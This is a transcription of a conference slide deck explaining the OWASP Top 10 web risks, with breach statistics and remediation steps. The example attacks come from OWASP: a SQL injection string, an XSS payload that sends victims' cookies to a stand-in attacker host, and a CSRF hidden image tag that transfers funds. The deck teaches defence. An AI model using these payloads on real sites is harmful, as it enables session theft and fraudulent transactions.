Top 10 Web Application Vulnerabilities

Similar documents
How to read security test report?

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Copyright

Pattern Recognition and Applications Lab WEB Security. Giorgio Giacinto.

Aguascalientes Local Chapter. Kickoff

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Web Application Security. Philippe Bogaerts

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

16th Annual Karnataka Conference

C1: Define Security Requirements

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

Applications Security

Objec&ves. Review: Security. Google s AI is wri&ng poetry SQL INJECTION ATTACK. SQL Injec&on. SQL Injec&on. Security:

Your Turn to Hack the OWASP Top 10!

Application Layer Security

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant


1 About Web Security. What is application security? So what can happen? see [?]

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Exploiting and Defending: Common Web Application Vulnerabilities

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December

Web Application Vulnerabilities: OWASP Top 10 Revisited

Solutions Business Manager Web Application Security Assessment

Simplifying Application Security and Compliance with the OWASP Top 10

OWASP TOP OWASP TOP

Securing Your Company s Web Presence

CIS 4360 Secure Computer Systems XSS

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

OPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Welcome to the OWASP TOP 10

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

Students should have an understanding and a working knowledge in the following topics, or attend these courses as a pre-requisite:

Sichere Software vom Java-Entwickler

CSCE 813 Internet Security Case Study II: XSS

Presentation Overview

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Application vulnerabilities and defences

Web basics: HTTP cookies

CISC So*ware Quality Assurance

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

"Charting the Course to Your Success!" Securing.Net Web Applications Lifecycle Course Summary

ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things. OWASP Wednesday 25 th May The OWASP Foundation

Developing Secure Systems. Associate Professor

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

F5 Application Security. Radovan Gibala Field Systems Engineer

Bank Infrastructure - Video - 1

Web basics: HTTP cookies

Web Application Penetration Testing

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009

Students should have an understanding and a working knowledge in the following topics, or attend these courses as a pre-requisite:

Introduction F rom a management perspective, application security is a difficult topic. Multiple parties within an organization are involved, as well

Client Side Injection on Web Applications

OWASP Top Dave Wichers OWASP Top 10 Project Lead OWASP Board Member COO/Cofounder, Aspect Security

GOING WHERE NO WAFS HAVE GONE BEFORE

Domino Web Server Security

OWASP Top The Top 10 Most Critical Web Application Security Risks. The OWASP Foundation

Developing Secure Systems. Introduction Aug 30, James Joshi, Professor, SCI

Development*Process*for*Secure* So2ware

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Common Websites Security Issues. Ziv Perry

John Coggeshall Copyright 2006, Zend Technologies Inc.

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

Securing Your Web Application against security vulnerabilities. Alvin Wong, Brand Manager IBM Rational Software

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

SAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0

CLOUD COMPUTING SECURITY THE SOFT SPOT Security by Application Development Quality Assurance

Web Application Threats and Remediation. Terry Labach, IST Security Team

CSCD 303 Essential Computer Security Fall 2018

CS 161 Computer Security

Security Communications and Awareness

Application Security. Doug Ashbaugh CISSP, CISA, CSSLP. Solving the Software Quality Puzzle

Engineering Your Software For Attack

Managed Application Security trends and best practices in application security

JAMES BENNETT DJANGOCON EUROPE 3RD JUNE 2015 THE NET IS DARK AND FULL OF TERRORS

Security Testing White Paper

Web Applica+on Security

RiskSense Attack Surface Validation for Web Applications

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

INNOV-09 How to Keep Hackers Out of your Web Application

Web Pen Tes)ng. Michael Hicks CMSC 498L, Fall 2012 Part 2 slides due to Eric Eames, Lead Penetra)on Tester, SAIC, March 2012

NET 311 INFORMATION SECURITY

Frontline Techniques to Prevent Web Application Vulnerability

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

CSCD 303 Essential Computer Security Fall 2017

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Web Application Whitepaper

Why bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?

Transcription:

Top 10 Web Application Vulnerabilities Why you should care about them plus a live hacking demo!!

Why should you care?! Insecure so*ware is undermining our financial, healthcare, defense, energy, and other cri8cal infrastructure. (Source: OWASP Top 10 2013, p.2)

Percentage (blue bar), and count of breaches per paiern. The gray line represents the percentage of breaches from the 2015 DBIR. (n=2,260). (Source: Verizon DBIR 2016)

class SuccessfulBreaches ( char source = Web applica8on aiacks ; public class SectorsArray { private String [] sectors = { Financial Services, Informa8on, Entertainment }; } public class SectorsArray { private Int [] percents = {82, 57, 50}; } public JavaStringArrayTests1() { int size = Sectors.length; for (int i=0; i<size; i++) { System.out.println(source, account for, percents, of confirmed breaches in the, sectors, sector [i]); } } Web application attacks account for! 82% of confirmed breaches in the Financial Services sector 57% of confirmed breaches in the Informa8on sector 50% of confirmed breaches in the Entertainment sector (Source: Verizon DBIR 2016)

In 2015, there were almost 20,000 incidents of websites that were compromised and used to either host malware, par8cipate in distributed denial-of-service (DDoS) aiacks or repurposed as a phishing site. (Source: Verizon DBIR 2016)

Open-source and third-party components introduce an average 24 vulnerabili8es into enterprise web applica8ons, code analysis company Veracode has found. (Source: Computer Weekly, A. Wickford, Oct 2014)

Cyber threat actors con8nue to exploit unpatched so*ware to conduct aiacks against cri8cal infrastructure organiza8ons. As many as 85 percent of targeted aiacks are preventable. (Source: US-Cert, TA15-119A)

Atop this year's [CWE]* list are SQL injec8on flaws, which are the most serious due to their common nature and the ease and frequency of exploit online. Other top vulnerabili8es include opera8ng system command injec8on, classic buffer overflow, and cross-site scrip8ng. (Source: Dark Reading, Feds Iden8fy Top 25 So*ware Vulnerabili8es ) *Common Weakness Enumera8on

So we all agree! this is a problem, right?!

Good news,! there is a solution!

What is OWASP?! Open Web Applica8on Security Project Worldwide, not-for-profit 501(c)(3) www.owasp.org Our mission is to make so*ware security visible, so that individuals and organiza8ons are able to make informed decisions.

OWASP Top 10 Project! A list of the 10 most cri8cal web applica8on security risks Version 1 released in 2003 Current version published in 2013 Prior versions 2010, 2007, and 2004 hip://owasptop10.googlecode.com/files/owasp%20top%2010%20-%202013.pdf

OWASP Top 10 Project! OWAP Top 10 is an awareness document NOT a standard But it is cited by many other organiza8ons Focus on risks, not just vulnerabili8es

OWASP Top 10 for 2013! A1 Injec8on A2 Broken Authen8ca8on and Session Management A3 Cross-Site Scrip8ng (XSS) A4 Insecure Direct Object References A5 Security Misconfigura8on A6 Sensi8ve Data Exposure A7 Missing Func8on Level Access Control A8 Cross-Site Request Forgery (CSRF) A9 Using Known Vulnerable Components A10 Unvalidated Redirects and Forwards

I m not a computer geek, what does all this mean?

A1 - Injection! Injec8on flaws, such as SQL, OS, and LDAP injec8on occur when untrusted data is sent to an interpreter as part of a command or query. The aiacker s hos8le data can trick the interpreter into execu.ng unintended commands or accessing data without proper authoriza.on.

Example Attack! The applica8on uses untrusted data in the construc8on of the following vulnerable SQL call: String query = "SELECT * FROM accounts WHERE custid='" + request.getparameter("id") + "'"; What if the aiacker modifies the id parameter value in his browser to send: ' or 1=1. For example: String query = "SELECT * FROM accounts WHERE custid='" + request.getparameter( or 1=1 ") + "'"; This changes the meaning of the query to return all the records from the accounts table. More dangerous aiacks could modify data or even invoke stored procedures.

Why does it work?! Because 1 always equals 1! Special characters, like ; = are not removed (escaped) from the query.

A2 Broken Auth & Session Mgmt! Applica8on func8ons related to authen8ca8on and session management are o*en not implemented correctly, allowing aiackers to compromise passwords, keys, or session tokens, or to exploit other implementa8on flaws to assume other users iden88es.

Example Attacks! Scenario #1: Airline reserva8ons applica8on supports URL rewri8ng, pu}ng session IDs in the URL: hip://example.com/sale/saleitems;jsessionid= 2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii An authen8cated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and stored credit card informa8on. (Free vaca8on to Hawaii)

Example Attacks! Scenario #2: Applica8on s 8meouts aren t set properly. User uses a public computer to access site. Instead of selec8ng logout the user simply closes the browser tab and walks away. AIacker uses the same browser an hour later, and that browser is s8ll authen8cated.

A3 Cross-Site Scripting (XSS)! XSS flaws occur whenever an applica8on takes untrusted data and sends it to a web browser without proper valida8on or escaping. XSS allows aiackers to execute scripts in the vic8m s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Example Attack! The applica8on uses untrusted data in the construc8on of the following HTML snippet without valida8on or escaping: (String) page += "<input name='creditcard' type='text value='" + request.getparameter("cc") + "'>"; The aiacker modifies the CC parameter in his browser to: '><script>document.loca8on= 'hip://www.aiacker.com/cgi-bin/ cookie.cgi? foo='+document.cookie</script>'. This causes the vic8m s session ID to be sent to the aiacker s website, allowing the aiacker to hijack the user s current session.

Why does it work?! The browser will automa8cally load the site contained in the <script> tags, and the website allows it to run!

A8 Cross-Site Request Forgery (CSRF)! A CSRF aiack forces a logged-on vic8m s browser to send a forged HTTP request, including the vic8m s session cookie and any other automa8cally included authen8ca8on informa8on, to a vulnerable web applica8on. This allows the aiacker to force the vic8m s browser to generate requests the vulnerable applica8on thinks are legi8mate requests from the vic8m.

Example Attack! The applica8on allows a user to submit a state changing request that does not include anything secret. For example: hip://example.com/app/transferfunds?amount=1500 &des8na8onaccount=4673243243 AIacker constructs a request that will transfer money from the vic8m s account to the aiacker s account, and then embeds this aiack in an image request or iframe stored on various sites under the aiacker s control: <img src="hip://example.com/app/transferfunds? amount=1500&des8na8onaccount=a8ackersacct# width="0" height="0" /> If the vic8m visits any of the aiacker s sites while he is already authen8cated to example.com, these forged requests will automa8cally include the user s session info, authorizing the aiacker s request.

Why does it work?! Simple parameter manipula8on; and the target site doesn t validate each request with an unpredictable token.

Live Hacking Demo! ISACA Geek Week 1 Hacking Demo Stuart Smith 45 August 2016

Evolution of the Top 10! Ranking 2007 2010 2013 1 Cross Site Scrip8ng (XSS) Injec8on Injec8on 2 Injec8on Flaws Cross Site Scrip8ng (XSS) 3 Malicious File Execu8on Broken Authen8ca8on and Session Management Broken Authen8ca8on and Session Management Cross-Site Scrip8ng (XSS) 4 Insecure Direct Object Reference Insecure Direct Object References Insecure Direct Object References 5 Cross Site Request Forgery (CSRF) Cross Site Request Forgery (CSRF) Security Misconfigura8on 6 7 Informa8on Leakage and Improper Error Handling Broken Authen8ca8on and Session Management Security Misconfigura8on Insecure Cryptographic Storage Sensi8ve Data Exposure Missing Func8on Level Access Control 8 Insecure Cryptographic Storage Failure to Restrict URL Access Cross-Site Request Forgery (CSRF) 9 Insecure Communica8ons Insufficient Transport Layer Protec8on Using Known Vulnerable Components 10 Failure to Restrict URL Access Unvalidated Redirects and Forwards Unvalidated Redirects and Forwards

Action Steps! 1. Web applica8on vulnerability scanners Commercial tools Open source tools 2. Secure Coding Awareness for developers OWASP has great resources 3. Sta8c Code Analysis tools (See #1 above)

Final Thoughts! OWASP Top 10 is not the end-all Defense in depth! Mobile is a growing threat OWASAP Top 10 Mobile: hips://www.owasp.org/index.php/mobile#tab=top_10_mobile_risks

QUESTIONS?!

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback